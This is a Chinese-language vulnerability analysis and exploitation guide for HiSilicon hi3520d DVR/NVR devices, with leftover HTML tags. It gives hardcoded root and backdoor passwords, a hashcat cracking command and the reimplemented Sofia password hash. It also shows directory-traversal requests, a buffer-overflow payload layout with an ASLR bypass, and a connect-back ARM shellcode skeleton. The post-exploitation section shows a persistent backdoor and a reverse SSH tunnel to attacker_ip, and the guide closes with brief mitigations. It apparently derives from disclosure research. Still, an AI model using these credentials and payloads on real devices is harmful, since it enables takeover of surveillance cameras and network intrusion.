HiSilicon DVR 漏洞分析与利用指南<\/h1>

1. 漏洞概述<\/h2>

本文档详细分析了HiSilicon hi3520d SoC构建的DVR\/NVR设备中存在的多个严重安全漏洞，包括：<\/p>

硬编码后门密码<\/strong> - 存在默认telnet密码<\/li>
权限提升漏洞<\/strong> - 任意应用账户可获取root shell<\/li>
后门应用密码<\/strong> - 通用密码可绕过认证<\/li>
缓冲区溢出漏洞<\/strong> - 可导致远程代码执行<\/li>

目录遍历漏洞<\/strong> - 可读取任意文件<\/li> <\/ol>
这些漏洞组合可导致未经授权的远程代码执行(RCE)和设备的完全控制。<\/p>
2. 设备分析<\/h2>
2.1 设备接口<\/h3>
测试设备标记为"Seculink"，主要接口包括：<\/p>

2个USB端口<\/li>
HDMI和VGA输出<\/li>
4个BNC连接器(模拟CCTV)<\/li>
SATA存储接口<\/li>
以太网端口<\/li> <\/ul>
2.2 服务扫描结果<\/h3>
端口扫描发现以下开放服务：<\/p>

23\/tcp: BusyBox telnetd<\/li>
80\/tcp: uc-httpd 1.0.0<\/li>
554\/tcp: RTSP服务<\/li>
9527\/tcp: 应用控制台<\/li>
34567\/tcp: 数据端口<\/li>
34599\/tcp: 未知服务<\/li> <\/ul>
3. 漏洞详细分析<\/h2>
3.1 硬编码后门密码<\/h3>
在\/etc\/passwd<\/code>中发现root用户的DES密码hash：<\/p>
root:absxcfbgXtb3o:0:0:root:\/:\/bin\/sh <\/code><\/pre> 使用hashcat破解：<\/p> .\/hashcat64.bin -a3 -m1500 absxcfbgXtb3o -1 ?l?d ?1?1?1?1?1?1 <\/code><\/pre> 破解结果为密码xc3511<\/code>，可通过telnet(23\/tcp)直接获取root访问。<\/p> 3.2 权限提升漏洞<\/h3> 通过9527\/tcp端口可访问应用控制台，使用任意应用凭据登录后执行shell<\/code>命令可直接获取root shell。<\/p> 3.3 后门应用密码<\/h3> 认证函数中存在硬编码后门密码I0TO5Wv9<\/code>，可用于：<\/p> 以任何用户身份登录Web界面<\/li> 访问RTSP视频流<\/li> 通过应用控制台获取root shell<\/li> <\/ul> 3.4 密码哈希算法<\/h3> 逆向分析发现密码哈希函数实现如下(Python)：<\/p> import<\/span> hashlib <\/span><\/span>def<\/span> sofia_hash<\/span>(msg): <\/span><\/span> h =<\/span> ""<\/span> <\/span><\/span> m =<\/span> hashlib.<\/span>md5() <\/span><\/span> m.<\/span>update(msg) <\/span><\/span> msg_md5 =<\/span> m.<\/span>digest() <\/span><\/span> for<\/span> i in<\/span> range(8<\/span>): <\/span><\/span> n =<\/span> (ord(msg_md5[2<\/span>*<\/span>i]) +<\/span> ord(msg_md5[2<\/span>*<\/span>i+<\/span>1<\/span>])) %<\/span> 0x3e<\/span> <\/span><\/span> if<\/span> n ><\/span> 9<\/span>: <\/span><\/span> if<\/span> n ><\/span> 35<\/span>: <\/span><\/span> n +=<\/span> 61<\/span> <\/span><\/span> else<\/span>: <\/span><\/span> n +=<\/span> 55<\/span> <\/span><\/span> else<\/span>: <\/span><\/span> n +=<\/span> 0x30<\/span> <\/span><\/span> h +=<\/span> chr(n) <\/span><\/span> return<\/span> h <\/span><\/span><\/code><\/pre>空密码的哈希值为tlJwpbo6<\/code>。<\/p> 3.5 缓冲区溢出漏洞<\/h3> Web服务器(80\/tcp)处理GET请求时存在缓冲区溢出漏洞：<\/p> GET \/[大量字符] HTTP <\/code><\/pre> 通过精心构造的请求可控制程序流：<\/p> 无NX保护(stack可执行)<\/li> 无ASLR保护(默认关闭)<\/li> 无栈保护(canary)<\/li> <\/ul> 3.6 目录遍历漏洞<\/h3> 通过构造特殊路径可读取任意文件：<\/p> GET ..\/..\/etc\/passwd HTTP GET ..\/..\/proc\/[pid]\/smaps HTTP <\/code><\/pre> 4. 漏洞利用<\/h2> 4.1 获取固件<\/h3> 通过root shell获取固件：<\/p> cat \/dev\/mtdblock1 > \/home\/mtdblock1-root.img <\/span><\/span>cat \/dev\/mtdblock2 > \/home\/mtdblock2-usr.img <\/span><\/span>... <\/span><\/span><\/code><\/pre>4.2 远程调试<\/h3> 使用gdbserver附加到目标进程：<\/p> \/mnt\/mtd\/gdbserver --attach :2000 [<\/span>pid]<\/span> <\/span><\/span><\/code><\/pre>本地连接：<\/p> gdb -ex 'set gnutarget elf32-littlearm'<\/span> -ex 'target remote [target_ip]:2000'<\/span> <\/span><\/span><\/code><\/pre>4.3 缓冲区溢出利用<\/h3> 4.3.1 Shellcode编写<\/h4> ARM架构的connect-back shellcode示例：<\/p> .section .text .global _start .code 32 _0: add r1, pc, #1 _4: bx r1 .code 16 _start: ; [shellcode实现细节...] <\/code><\/pre> 编译shellcode：<\/p> armv7a-hardfloat-linux-gnueabi-as shellcode.S -o shellcode.o <\/span><\/span>armv7a-hardfloat-linux-gnueabi-ld.bfd shellcode.o -o shellcode <\/span><\/span>armv7a-hardfloat-linux-gnueabi-objcopy -O binary --only-section=<\/span>.text .\/shellcode .\/shellcode.bin <\/span><\/span><\/code><\/pre>4.3.2 绕过ASLR<\/h4> 通过目录遍历读取\/proc\/[pid]\/smaps<\/code>获取栈地址：<\/p> GET ..\/..\/proc\/610\/smaps HTTP <\/span><\/span><\/code><\/pre>分析smaps文件确定栈区域基址。<\/p> 4.3.3 构造Payload<\/h4> 最终payload结构：<\/p> GET [shellcode][padding][return_address] HTTP <\/code><\/pre> 其中return_address指向shellcode起始地址。<\/p> 4.4 自动化利用脚本<\/h3> 提供Python脚本pwn_hisilicon_dvr.py<\/code>自动化利用过程，主要参数：<\/p> --rhost: 目标主机 --lhost: 回调IP --lport: 回调端口 -p: 持久化 -u: 上传工具 <\/code><\/pre> 5. 后渗透利用<\/h2> 获取RCE后可：<\/p> 上传工具(如Dropbear SSH服务器)<\/li> 建立持久化后门<\/li> 创建反向SSH隧道<\/li> <\/ol> 示例：<\/p> .\/dropbear -r .\/dropbear_ecdsa.key -p 127.0.0.1:22 <\/span><\/span>.\/ssh -i .\/id_rsa.dropbear -N -f -T -R 2322:localhost:22 user@attacker_ip <\/span><\/span><\/code><\/pre>6. 受影响设备<\/h2> 大量使用HiSilicon hi3520d SoC和"Sofia"固件的设备受影响，包括但不限于：<\/p> Vacron<\/li> Gess<\/li> Jufeng<\/li> LuxVision<\/li> 其他多个品牌<\/li> <\/ul> 7. 缓解措施<\/h2> 隔离设备网络<\/li> 禁用不必要的服务(telnet等)<\/li> 更新到最新固件(如果可用)<\/li> 使用强密码<\/li> 限制网络访问<\/li> <\/ol> 8. 结论<\/h2> HiSilicon DVR设备存在多个严重漏洞，组合利用可导致设备完全控制。由于缺乏固件更新，建议替换这些设备或严格隔离其网络访问。<\/p>